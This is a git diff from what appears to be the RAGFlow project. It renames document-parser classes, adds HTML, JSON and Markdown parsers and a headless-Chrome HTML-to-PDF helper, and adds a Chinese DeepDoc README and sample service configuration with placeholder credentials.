if re.match(r".*\.(jpg|jpeg|png|tif|gif|pcx|tga|exif|fpx|svg|psd|cdr|pcd|dxf|ufo|eps|ai|raw|WMF|webp|avif|apng|icon|ico|mpg|mpeg|avi|rm|rmvb|mov|wmv|asf|dat|asx|wvx|mpe|mpa|mp4)$", filename):
|
||||
return FileType.VISUAL
|
||||
return FileType.VISUAL.value
|
||||
|
||||
return FileType.OTHER.value
|
||||
|
||||
|
||||
def thumbnail(filename, blob):
|
||||
filename = filename.lower()
|
||||
if re.match(r".*\.pdf$", filename):
|
||||
pdf = fitz.open(stream=blob, filetype="pdf")
|
||||
pix = pdf[0].get_pixmap(matrix=fitz.Matrix(0.03, 0.03))
|
||||
pdf = pdfplumber.open(BytesIO(blob))
|
||||
buffered = BytesIO()
|
||||
Image.frombytes("RGB", [pix.width, pix.height],
|
||||
pix.samples).save(buffered, format="png")
|
||||
pdf.pages[0].to_image(resolution=32).annotated.save(buffered, format="png")
|
||||
return "data:image/png;base64," + \
|
||||
base64.b64encode(buffered.getvalue()).decode("utf-8")
|
||||
|
||||
|
||||
80
api/utils/web_utils.py
Normal file
80
api/utils/web_utils.py
Normal file
@ -0,0 +1,80 @@
|
||||
import re
|
||||
import json
|
||||
import base64
|
||||
|
||||
from selenium import webdriver
|
||||
from selenium.webdriver.chrome.options import Options
|
||||
from selenium.webdriver.chrome.service import Service
|
||||
from selenium.common.exceptions import TimeoutException
|
||||
from selenium.webdriver.support.ui import WebDriverWait
|
||||
from selenium.webdriver.support.expected_conditions import staleness_of
|
||||
from webdriver_manager.chrome import ChromeDriverManager
|
||||
from selenium.webdriver.common.by import By
|
||||
|
||||
|
||||
def html2pdf(
|
||||
source: str,
|
||||
timeout: int = 2,
|
||||
install_driver: bool = True,
|
||||
print_options: dict = {},
|
||||
):
|
||||
result = __get_pdf_from_html(source, timeout, install_driver, print_options)
|
||||
return result
|
||||
|
||||
|
||||
def __send_devtools(driver, cmd, params={}):
|
||||
resource = "/session/%s/chromium/send_command_and_get_result" % driver.session_id
|
||||
url = driver.command_executor._url + resource
|
||||
body = json.dumps({"cmd": cmd, "params": params})
|
||||
response = driver.command_executor._request("POST", url, body)
|
||||
|
||||
if not response:
|
||||
raise Exception(response.get("value"))
|
||||
|
||||
return response.get("value")
|
||||
|
||||
|
||||
def __get_pdf_from_html(
|
||||
path: str,
|
||||
timeout: int,
|
||||
install_driver: bool,
|
||||
print_options: dict
|
||||
):
|
||||
webdriver_options = Options()
|
||||
webdriver_prefs = {}
|
||||
webdriver_options.add_argument("--headless")
|
||||
webdriver_options.add_argument("--disable-gpu")
|
||||
webdriver_options.add_argument("--no-sandbox")
|
||||
webdriver_options.add_argument("--disable-dev-shm-usage")
|
||||
webdriver_options.experimental_options["prefs"] = webdriver_prefs
|
||||
|
||||
webdriver_prefs["profile.default_content_settings"] = {"images": 2}
|
||||
|
||||
if install_driver:
|
||||
service = Service(ChromeDriverManager().install())
|
||||
driver = webdriver.Chrome(service=service, options=webdriver_options)
|
||||
else:
|
||||
driver = webdriver.Chrome(options=webdriver_options)
|
||||
|
||||
driver.get(path)
|
||||
|
||||
try:
|
||||
WebDriverWait(driver, timeout).until(
|
||||
staleness_of(driver.find_element(by=By.TAG_NAME, value="html"))
|
||||
)
|
||||
except TimeoutException:
|
||||
calculated_print_options = {
|
||||
"landscape": False,
|
||||
"displayHeaderFooter": False,
|
||||
"printBackground": True,
|
||||
"preferCSSPageSize": True,
|
||||
}
|
||||
calculated_print_options.update(print_options)
|
||||
result = __send_devtools(
|
||||
driver, "Page.printToPDF", calculated_print_options)
|
||||
driver.quit()
|
||||
return base64.b64decode(result["data"])
|
||||
|
||||
|
||||
def is_valid_url(url: str) -> bool:
|
||||
return bool(re.match(r"(https?|ftp|file)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]+[-A-Za-z0-9+&@#/%=~_|]", url))
|
||||
@ -14,17 +14,15 @@
|
||||
# limitations under the License.
|
||||
#
|
||||
import os
|
||||
|
||||
import dotenv
|
||||
import typing
|
||||
|
||||
from api.utils.file_utils import get_project_base_directory
|
||||
|
||||
|
||||
def get_versions() -> typing.Mapping[str, typing.Any]:
|
||||
return dotenv.dotenv_values(
|
||||
dotenv_path=os.path.join(get_project_base_directory(), "rag.env")
|
||||
)
|
||||
dotenv.load_dotenv(dotenv.find_dotenv())
|
||||
return dotenv.dotenv_values()
|
||||
|
||||
|
||||
def get_rag_version() -> typing.Optional[str]:
|
||||
return get_versions().get("RAG")
|
||||
return get_versions().get("RAGFLOW_VERSION", "dev")
|
||||
@ -1,7 +1,7 @@
|
||||
{
|
||||
"settings": {
|
||||
"index": {
|
||||
"number_of_shards": 4,
|
||||
"number_of_shards": 2,
|
||||
"number_of_replicas": 0,
|
||||
"refresh_interval" : "1000ms"
|
||||
},
|
||||
|
||||
@ -15,14 +15,27 @@ minio:
|
||||
host: 'minio:9000'
|
||||
es:
|
||||
hosts: 'http://es01:9200'
|
||||
username: 'elastic'
|
||||
password: 'infini_rag_flow'
|
||||
redis:
|
||||
db: 1
|
||||
password: 'infini_rag_flow'
|
||||
host: 'redis:6379'
|
||||
user_default_llm:
|
||||
factory: 'Tongyi-Qianwen'
|
||||
api_key: 'sk-xxxxxxxxxxxxx'
|
||||
base_url: ''
|
||||
oauth:
|
||||
github:
|
||||
client_id: xxxxxxxxxxxxxxxxxxxxxxxxx
|
||||
secret_key: xxxxxxxxxxxxxxxxxxxxxxxxxxxx
|
||||
url: https://github.com/login/oauth/access_token
|
||||
feishu:
|
||||
app_id: cli_xxxxxxxxxxxxxxxxxxx
|
||||
app_secret: xxxxxxxxxxxxxxxxxxxxxxxxxxxx
|
||||
app_access_token_url: https://open.feishu.cn/open-apis/auth/v3/app_access_token/internal
|
||||
user_access_token_url: https://open.feishu.cn/open-apis/authen/v1/oidc/access_token
|
||||
grant_type: 'authorization_code'
|
||||
authentication:
|
||||
client:
|
||||
switch: false
|
||||
|
||||
@ -1 +1,116 @@
|
||||
[English](./README.md) | 简体中文
|
||||
|
||||
# *Deep*Doc
|
||||
|
||||
- [*Deep*Doc](#deepdoc)
|
||||
- [1. 介绍](#1-介绍)
|
||||
- [2. 视觉处理](#2-视觉处理)
|
||||
- [3. 解析器](#3-解析器)
|
||||
- [简历](#简历)
|
||||
|
||||
<a name="1"></a>
|
||||
## 1. 介绍
|
||||
|
||||
对于来自不同领域、具有不同格式和不同检索要求的大量文档,准确的分析成为一项极具挑战性的任务。*Deep*Doc 就是为了这个目的而诞生的。到目前为止,*Deep*Doc 中有两个组成部分:视觉处理和解析器。如果您对我们的OCR、布局识别和TSR结果感兴趣,您可以运行下面的测试程序。
|
||||
|
||||
```bash
|
||||
python deepdoc/vision/t_ocr.py -h
|
||||
usage: t_ocr.py [-h] --inputs INPUTS [--output_dir OUTPUT_DIR]
|
||||
|
||||
options:
|
||||
-h, --help show this help message and exit
|
||||
--inputs INPUTS Directory where to store images or PDFs, or a file path to a single image or PDF
|
||||
--output_dir OUTPUT_DIR
|
||||
Directory where to store the output images. Default: './ocr_outputs'
|
||||
```
|
||||
|
||||
```bash
|
||||
python deepdoc/vision/t_recognizer.py -h
|
||||
usage: t_recognizer.py [-h] --inputs INPUTS [--output_dir OUTPUT_DIR] [--threshold THRESHOLD] [--mode {layout,tsr}]
|
||||
|
||||
options:
|
||||
-h, --help show this help message and exit
|
||||
--inputs INPUTS Directory where to store images or PDFs, or a file path to a single image or PDF
|
||||
--output_dir OUTPUT_DIR
|
||||
Directory where to store the output images. Default: './layouts_outputs'
|
||||
--threshold THRESHOLD
|
||||
A threshold to filter out detections. Default: 0.5
|
||||
--mode {layout,tsr} Task mode: layout recognition or table structure recognition
|
||||
```
|
||||
|
||||
HuggingFace为我们的模型提供服务。如果你在下载HuggingFace模型时遇到问题,这可能会有所帮助!!
|
||||
|
||||
```bash
|
||||
export HF_ENDPOINT=https://hf-mirror.com
|
||||
```
|
||||
|
||||
<a name="2"></a>
|
||||
## 2. 视觉处理
|
||||
|
||||
作为人类,我们使用视觉信息来解决问题。
|
||||
|
||||
- **OCR(Optical Character Recognition,光学字符识别)**。由于许多文档都是以图像形式呈现的,或者至少能够转换为图像,因此OCR是文本提取的一个非常重要、基本,甚至通用的解决方案。
|
||||
|
||||
```bash
|
||||
python deepdoc/vision/t_ocr.py --inputs=path_to_images_or_pdfs --output_dir=path_to_store_result
|
||||
```
|
||||
|
||||
输入可以是图像或PDF的目录,或者单个图像、PDF文件。您可以查看文件夹 `path_to_store_result` ,其中有演示结果位置的图像,以及包含OCR文本的txt文件。
|
||||
|
||||
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
||||
<img src="https://github.com/infiniflow/ragflow/assets/12318111/f25bee3d-aaf7-4102-baf5-d5208361d110" width="900"/>
|
||||
</div>
|
||||
|
||||
- 布局识别(Layout recognition)。来自不同领域的文件可能有不同的布局,如报纸、杂志、书籍和简历在布局方面是不同的。只有当机器有准确的布局分析时,它才能决定这些文本部分是连续的还是不连续的,或者这个部分需要表结构识别(Table Structure Recognition,TSR)来处理,或者这个部件是一个图形并用这个标题来描述。我们有10个基本布局组件,涵盖了大多数情况:
|
||||
- 文本
|
||||
- 标题
|
||||
- 配图
|
||||
- 配图标题
|
||||
- 表格
|
||||
- 表格标题
|
||||
- 页头
|
||||
- 页尾
|
||||
- 参考引用
|
||||
- 公式
|
||||
|
||||
请尝试以下命令以查看布局检测结果。
|
||||
|
||||
```bash
|
||||
python deepdoc/vision/t_recognizer.py --inputs=path_to_images_or_pdfs --threshold=0.2 --mode=layout --output_dir=path_to_store_result
|
||||
```
|
||||
|
||||
输入可以是图像或PDF的目录,或者单个图像、PDF文件。您可以查看文件夹 `path_to_store_result` ,其中有显示检测结果的图像,如下所示:
|
||||
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
||||
<img src="https://github.com/infiniflow/ragflow/assets/12318111/07e0f625-9b28-43d0-9fbb-5bf586cd286f" width="1000"/>
|
||||
</div>
|
||||
|
||||
- **TSR(Table Structure Recognition,表结构识别)**。数据表是一种常用的结构,用于表示包括数字或文本在内的数据。表的结构可能非常复杂,比如层次结构标题、跨单元格和投影行标题。除了TSR,我们还将内容重新组合成LLM可以很好理解的句子。TSR任务有五个标签:
|
||||
- 列
|
||||
- 行
|
||||
- 列标题
|
||||
- 行标题
|
||||
- 合并单元格
|
||||
|
||||
请尝试以下命令以查看布局检测结果。
|
||||
|
||||
```bash
|
||||
python deepdoc/vision/t_recognizer.py --inputs=path_to_images_or_pdfs --threshold=0.2 --mode=tsr --output_dir=path_to_store_result
|
||||
```
|
||||
|
||||
输入可以是图像或PDF的目录,或者单个图像、PDF文件。您可以查看文件夹 `path_to_store_result` ,其中包含图像和html页面,这些页面展示了以下检测结果:
|
||||
|
||||
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
||||
<img src="https://github.com/infiniflow/ragflow/assets/12318111/cb24e81b-f2ba-49f3-ac09-883d75606f4c" width="1000"/>
|
||||
</div>
|
||||
|
||||
<a name="3"></a>
|
||||
## 3. 解析器
|
||||
|
||||
PDF、DOCX、EXCEL和PPT四种文档格式都有相应的解析器。最复杂的是PDF解析器,因为PDF具有灵活性。PDF解析器的输出包括:
|
||||
- 在PDF中有自己位置的文本块(页码和矩形位置)。
|
||||
- 带有PDF裁剪图像的表格,以及已经翻译成自然语言句子的内容。
|
||||
- 图中带标题和文字的图。
|
||||
|
||||
### 简历
|
||||
|
||||
简历是一种非常复杂的文件。一份由各种布局的非结构化文本组成的简历可以分解为由近百个字段组成的结构化数据。我们还没有打开解析器,因为我们在解析过程之后打开了处理方法。
|
||||
|
||||
@ -1,6 +1,20 @@
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
|
||||
|
||||
from .pdf_parser import HuParser as PdfParser, PlainParser
|
||||
from .docx_parser import HuDocxParser as DocxParser
|
||||
from .excel_parser import HuExcelParser as ExcelParser
|
||||
from .ppt_parser import HuPptParser as PptParser
|
||||
from .pdf_parser import RAGFlowPdfParser as PdfParser, PlainParser
|
||||
from .docx_parser import RAGFlowDocxParser as DocxParser
|
||||
from .excel_parser import RAGFlowExcelParser as ExcelParser
|
||||
from .ppt_parser import RAGFlowPptParser as PptParser
|
||||
from .html_parser import RAGFlowHtmlParser as HtmlParser
|
||||
from .json_parser import RAGFlowJsonParser as JsonParser
|
||||
from .markdown_parser import RAGFlowMarkdownParser as MarkdownParser
|
||||
@ -1,13 +1,25 @@
|
||||
# -*- coding: utf-8 -*-
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
|
||||
from docx import Document
|
||||
import re
|
||||
import pandas as pd
|
||||
from collections import Counter
|
||||
from rag.nlp import huqie
|
||||
from rag.nlp import rag_tokenizer
|
||||
from io import BytesIO
|
||||
|
||||
|
||||
class HuDocxParser:
|
||||
class RAGFlowDocxParser:
|
||||
|
||||
def __extract_table_content(self, tb):
|
||||
df = []
|
||||
@ -35,14 +47,14 @@ class HuDocxParser:
|
||||
for p, n in patt:
|
||||
if re.search(p, b):
|
||||
return n
|
||||
tks = [t for t in huqie.qie(b).split(" ") if len(t) > 1]
|
||||
tks = [t for t in rag_tokenizer.tokenize(b).split(" ") if len(t) > 1]
|
||||
if len(tks) > 3:
|
||||
if len(tks) < 12:
|
||||
return "Tx"
|
||||
else:
|
||||
return "Lx"
|
||||
|
||||
if len(tks) == 1 and huqie.tag(tks[0]) == "nr":
|
||||
if len(tks) == 1 and rag_tokenizer.tag(tks[0]) == "nr":
|
||||
return "Nr"
|
||||
|
||||
return "Ot"
|
||||
@ -101,19 +113,24 @@ class HuDocxParser:
|
||||
def __call__(self, fnm, from_page=0, to_page=100000):
|
||||
self.doc = Document(fnm) if isinstance(
|
||||
fnm, str) else Document(BytesIO(fnm))
|
||||
pn = 0
|
||||
secs = []
|
||||
pn = 0 # parsed page
|
||||
secs = [] # parsed contents
|
||||
for p in self.doc.paragraphs:
|
||||
if pn > to_page:
|
||||
break
|
||||
if from_page <= pn < to_page and p.text.strip():
|
||||
secs.append((p.text, p.style.name))
|
||||
|
||||
runs_within_single_paragraph = [] # save runs within the range of pages
|
||||
for run in p.runs:
|
||||
if 'lastRenderedPageBreak' in run._element.xml:
|
||||
pn += 1
|
||||
continue
|
||||
if 'w:br' in run._element.xml and 'type="page"' in run._element.xml:
|
||||
if pn > to_page:
|
||||
break
|
||||
if from_page <= pn < to_page and p.text.strip():
|
||||
runs_within_single_paragraph.append(run.text) # append run.text first
|
||||
|
||||
# wrap page break checker into a static method
|
||||
if RAGFlowDocxParser.has_page_break(run._element.xml):
|
||||
pn += 1
|
||||
|
||||
secs.append(("".join(runs_within_single_paragraph), p.style.name)) # then concat run.text as part of the paragraph
|
||||
|
||||
tbls = [self.__extract_table_content(tb) for tb in self.doc.tables]
|
||||
return secs, tbls
|
||||
|
||||
@ -1,25 +1,46 @@
|
||||
# -*- coding: utf-8 -*-
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
|
||||
from openpyxl import load_workbook
|
||||
import sys
|
||||
from io import BytesIO
|
||||
|
||||
from rag.nlp import find_codec
|
||||
|
||||
class HuExcelParser:
|
||||
def html(self, fnm):
|
||||
|
||||
class RAGFlowExcelParser:
|
||||
def html(self, fnm, chunk_rows=256):
|
||||
if isinstance(fnm, str):
|
||||
wb = load_workbook(fnm)
|
||||
else:
|
||||
wb = load_workbook(BytesIO(fnm))
|
||||
tb = ""
|
||||
|
||||
tb_chunks = []
|
||||
for sheetname in wb.sheetnames:
|
||||
ws = wb[sheetname]
|
||||
rows = list(ws.rows)
|
||||
if not rows:continue
|
||||
tb += f"<table><caption>{sheetname}</caption><tr>"
|
||||
if not rows: continue
|
||||
|
||||
tb_rows_0 = "<tr>"
|
||||
for t in list(rows[0]):
|
||||
tb += f"<th>{t.value}</th>"
|
||||
tb += "</tr>"
|
||||
for r in list(rows[1:]):
|
||||
tb_rows_0 += f"<th>{t.value}</th>"
|
||||
tb_rows_0 += "</tr>"
|
||||
|
||||
for chunk_i in range((len(rows) - 1) // chunk_rows + 1):
|
||||
tb = ""
|
||||
tb += f"<table><caption>{sheetname}</caption>"
|
||||
tb += tb_rows_0
|
||||
for r in list(rows[1 + chunk_i * chunk_rows:1 + (chunk_i + 1) * chunk_rows]):
|
||||
tb += "<tr>"
|
||||
for i, c in enumerate(r):
|
||||
if c.value is None:
|
||||
@ -28,7 +49,9 @@ class HuExcelParser:
|
||||
tb += f"<td>{c.value}</td>"
|
||||
tb += "</tr>"
|
||||
tb += "</table>\n"
|
||||
return tb
|
||||
tb_chunks.append(tb)
|
||||
|
||||
return tb_chunks
|
||||
|
||||
def __call__(self, fnm):
|
||||
if isinstance(fnm, str):
|
||||
@ -66,10 +89,11 @@ class HuExcelParser:
|
||||
return total
|
||||
|
||||
if fnm.split(".")[-1].lower() in ["csv", "txt"]:
|
||||
txt = binary.decode("utf-8")
|
||||
encoding = find_codec(binary)
|
||||
txt = binary.decode(encoding, errors="ignore")
|
||||
return len(txt.split("\n"))
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
psr = HuExcelParser()
|
||||
psr = RAGFlowExcelParser()
|
||||
psr(sys.argv[1])
|
||||
|
||||
39
deepdoc/parser/html_parser.py
Normal file
39
deepdoc/parser/html_parser.py
Normal file
@ -0,0 +1,39 @@
|
||||
# -*- coding: utf-8 -*-
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from rag.nlp import find_codec
|
||||
import readability
|
||||
import html_text
|
||||
import chardet
|
||||
|
||||
def get_encoding(file):
|
||||
with open(file,'rb') as f:
|
||||
tmp = chardet.detect(f.read())
|
||||
return tmp['encoding']
|
||||
|
||||
class RAGFlowHtmlParser:
|
||||
def __call__(self, fnm, binary=None):
|
||||
txt = ""
|
||||
if binary:
|
||||
encoding = find_codec(binary)
|
||||
txt = binary.decode(encoding, errors="ignore")
|
||||
else:
|
||||
with open(fnm, "r",encoding=get_encoding(fnm)) as f:
|
||||
txt = f.read()
|
||||
|
||||
html_doc = readability.Document(txt)
|
||||
title = html_doc.title()
|
||||
content = html_text.extract_text(html_doc.summary(html_partial=True))
|
||||
txt = f'{title}\n{content}'
|
||||
sections = txt.split("\n")
|
||||
return sections
|
||||
116
deepdoc/parser/json_parser.py
Normal file
116
deepdoc/parser/json_parser.py
Normal file
@ -0,0 +1,116 @@
|
||||
# -*- coding: utf-8 -*-
|
||||
# The following documents are mainly referenced, and only adaptation modifications have been made
|
||||
# from https://github.com/langchain-ai/langchain/blob/master/libs/text-splitters/langchain_text_splitters/json.py
|
||||
|
||||
import json
|
||||
from typing import Any, Dict, List, Optional
|
||||
from rag.nlp import find_codec
|
||||
|
||||
class RAGFlowJsonParser:
|
||||
def __init__(
|
||||
self, max_chunk_size: int = 2000, min_chunk_size: Optional[int] = None
|
||||
):
|
||||
super().__init__()
|
||||
self.max_chunk_size = max_chunk_size * 2
|
||||
self.min_chunk_size = (
|
||||
min_chunk_size
|
||||
if min_chunk_size is not None
|
||||
else max(max_chunk_size - 200, 50)
|
||||
)
|
||||
|
||||
def __call__(self, binary):
|
||||
encoding = find_codec(binary)
|
||||
txt = binary.decode(encoding, errors="ignore")
|
||||
json_data = json.loads(txt)
|
||||
chunks = self.split_json(json_data, True)
|
||||
sections = [json.dumps(l, ensure_ascii=False) for l in chunks if l]
|
||||
return sections
|
||||
|
||||
@staticmethod
|
||||
def _json_size(data: Dict) -> int:
|
||||
"""Calculate the size of the serialized JSON object."""
|
||||
return len(json.dumps(data, ensure_ascii=False))
|
||||
|
||||
@staticmethod
|
||||
def _set_nested_dict(d: Dict, path: List[str], value: Any) -> None:
|
||||
"""Set a value in a nested dictionary based on the given path."""
|
||||
for key in path[:-1]:
|
||||
d = d.setdefault(key, {})
|
||||
d[path[-1]] = value
|
||||
|
||||
def _list_to_dict_preprocessing(self, data: Any) -> Any:
|
||||
if isinstance(data, dict):
|
||||
# Process each key-value pair in the dictionary
|
||||
return {k: self._list_to_dict_preprocessing(v) for k, v in data.items()}
|
||||
elif isinstance(data, list):
|
||||
# Convert the list to a dictionary with index-based keys
|
||||
return {
|
||||
str(i): self._list_to_dict_preprocessing(item)
|
||||
for i, item in enumerate(data)
|
||||
}
|
||||
else:
|
||||
# Base case: the item is neither a dict nor a list, so return it unchanged
|
||||
return data
|
||||
|
||||
def _json_split(
|
||||
self,
|
||||
data: Dict[str, Any],
|
||||
current_path: Optional[List[str]] = None,
|
||||
chunks: Optional[List[Dict]] = None,
|
||||
) -> List[Dict]:
|
||||
"""
|
||||
Split json into maximum size dictionaries while preserving structure.
|
||||
"""
|
||||
current_path = current_path or []
|
||||
chunks = chunks or [{}]
|
||||
if isinstance(data, dict):
|
||||
for key, value in data.items():
|
||||
new_path = current_path + [key]
|
||||
chunk_size = self._json_size(chunks[-1])
|
||||
size = self._json_size({key: value})
|
||||
remaining = self.max_chunk_size - chunk_size
|
||||
|
||||
if size < remaining:
|
||||
# Add item to current chunk
|
||||
self._set_nested_dict(chunks[-1], new_path, value)
|
||||
else:
|
||||
if chunk_size >= self.min_chunk_size:
|
||||
# Chunk is big enough, start a new chunk
|
||||
chunks.append({})
|
||||
|
||||
# Iterate
|
||||
self._json_split(value, new_path, chunks)
|
||||
else:
|
||||
# handle single item
|
||||
self._set_nested_dict(chunks[-1], current_path, data)
|
||||
return chunks
|
||||
|
||||
def split_json(
|
||||
self,
|
||||
json_data: Dict[str, Any],
|
||||
convert_lists: bool = False,
|
||||
) -> List[Dict]:
|
||||
"""Splits JSON into a list of JSON chunks"""
|
||||
|
||||
if convert_lists:
|
||||
chunks = self._json_split(self._list_to_dict_preprocessing(json_data))
|
||||
else:
|
||||
chunks = self._json_split(json_data)
|
||||
|
||||
# Remove the last chunk if it's empty
|
||||
if not chunks[-1]:
|
||||
chunks.pop()
|
||||
return chunks
|
||||
|
||||
def split_text(
|
||||
self,
|
||||
json_data: Dict[str, Any],
|
||||
convert_lists: bool = False,
|
||||
ensure_ascii: bool = True,
|
||||
) -> List[str]:
|
||||
"""Splits JSON into a list of JSON formatted strings"""
|
||||
|
||||
chunks = self.split_json(json_data=json_data, convert_lists=convert_lists)
|
||||
|
||||
# Convert to string
|
||||
return [json.dumps(chunk, ensure_ascii=ensure_ascii) for chunk in chunks]
|
||||
44
deepdoc/parser/markdown_parser.py
Normal file
44
deepdoc/parser/markdown_parser.py
Normal file
@ -0,0 +1,44 @@
|
||||
# -*- coding: utf-8 -*-
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
import re
|
||||
|
||||
class RAGFlowMarkdownParser:
|
||||
def __init__(self, chunk_token_num=128):
|
||||
self.chunk_token_num = int(chunk_token_num)
|
||||
|
||||
def extract_tables_and_remainder(self, markdown_text):
|
||||
# Standard Markdown table
|
||||
table_pattern = re.compile(
|
||||
r'''
|
||||
(?:\n|^)
|
||||
(?:\|.*?\|.*?\|.*?\n)
|
||||
(?:\|(?:\s*[:-]+[-| :]*\s*)\|.*?\n)
|
||||
(?:\|.*?\|.*?\|.*?\n)+
|
||||
''', re.VERBOSE)
|
||||
tables = table_pattern.findall(markdown_text)
|
||||
remainder = table_pattern.sub('', markdown_text)
|
||||
|
||||
# Borderless Markdown table
|
||||
no_border_table_pattern = re.compile(
|
||||
r'''
|
||||
(?:\n|^)
|
||||
(?:\S.*?\|.*?\n)
|
||||
(?:(?:\s*[:-]+[-| :]*\s*).*?\n)
|
||||
(?:\S.*?\|.*?\n)+
|
||||
''', re.VERBOSE)
|
||||
no_border_tables = no_border_table_pattern.findall(remainder)
|
||||
tables.extend(no_border_tables)
|
||||
remainder = no_border_table_pattern.sub('', remainder)
|
||||
|
||||
return remainder, tables
|
||||
@ -1,8 +1,19 @@
|
||||
# -*- coding: utf-8 -*-
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
|
||||
import os
|
||||
import random
|
||||
|
||||
import fitz
|
||||
import xgboost as xgb
|
||||
from io import BytesIO
|
||||
import torch
|
||||
@ -11,19 +22,19 @@ import pdfplumber
|
||||
import logging
|
||||
from PIL import Image, ImageDraw
|
||||
import numpy as np
|
||||
|
||||
from timeit import default_timer as timer
|
||||
from PyPDF2 import PdfReader as pdf2_read
|
||||
|
||||
from api.utils.file_utils import get_project_base_directory
|
||||
from deepdoc.vision import OCR, Recognizer, LayoutRecognizer, TableStructureRecognizer
|
||||
from rag.nlp import huqie
|
||||
from rag.nlp import rag_tokenizer
|
||||
from copy import deepcopy
|
||||
from huggingface_hub import snapshot_download
|
||||
|
||||
logging.getLogger("pdfminer").setLevel(logging.WARNING)
|
||||
|
||||
|
||||
class HuParser:
|
||||
class RAGFlowPdfParser:
|
||||
def __init__(self):
|
||||
self.ocr = OCR()
|
||||
if hasattr(self, "model_speciess"):
|
||||
@ -43,11 +54,12 @@ class HuParser:
|
||||
model_dir, "updown_concat_xgb.model"))
|
||||
except Exception as e:
|
||||
model_dir = snapshot_download(
|
||||
repo_id="InfiniFlow/text_concat_xgb_v1.0")
|
||||
repo_id="InfiniFlow/text_concat_xgb_v1.0",
|
||||
local_dir=os.path.join(get_project_base_directory(), "rag/res/deepdoc"),
|
||||
local_dir_use_symlinks=False)
|
||||
self.updown_cnt_mdl.load_model(os.path.join(
|
||||
model_dir, "updown_concat_xgb.model"))
|
||||
|
||||
|
||||
self.page_from = 0
|
||||
"""
|
||||
If you have trouble downloading HuggingFace models, -_^ this might help!!
|
||||
@ -62,7 +74,7 @@ class HuParser:
|
||||
"""
|
||||
|
||||
def __char_width(self, c):
|
||||
return (c["x1"] - c["x0"]) // len(c["text"])
|
||||
return (c["x1"] - c["x0"]) // max(len(c["text"]), 1)
|
||||
|
||||
def __height(self, c):
|
||||
return c["bottom"] - c["top"]
|
||||
@ -94,13 +106,13 @@ class HuParser:
|
||||
h = max(self.__height(up), self.__height(down))
|
||||
y_dis = self._y_dis(up, down)
|
||||
LEN = 6
|
||||
tks_down = huqie.qie(down["text"][:LEN]).split(" ")
|
||||
tks_up = huqie.qie(up["text"][-LEN:]).split(" ")
|
||||
tks_down = rag_tokenizer.tokenize(down["text"][:LEN]).split(" ")
|
||||
tks_up = rag_tokenizer.tokenize(up["text"][-LEN:]).split(" ")
|
||||
tks_all = up["text"][-LEN:].strip() \
|
||||
+ (" " if re.match(r"[a-zA-Z0-9]+",
|
||||
up["text"][-1] + down["text"][0]) else "") \
|
||||
+ down["text"][:LEN].strip()
|
||||
tks_all = huqie.qie(tks_all).split(" ")
|
||||
tks_all = rag_tokenizer.tokenize(tks_all).split(" ")
|
||||
fea = [
|
||||
up.get("R", -1) == down.get("R", -1),
|
||||
y_dis / h,
|
||||
@ -141,8 +153,8 @@ class HuParser:
|
||||
tks_down[-1] == tks_up[-1],
|
||||
max(down["in_row"], up["in_row"]),
|
||||
abs(down["in_row"] - up["in_row"]),
|
||||
len(tks_down) == 1 and huqie.tag(tks_down[0]).find("n") >= 0,
|
||||
len(tks_up) == 1 and huqie.tag(tks_up[0]).find("n") >= 0
|
||||
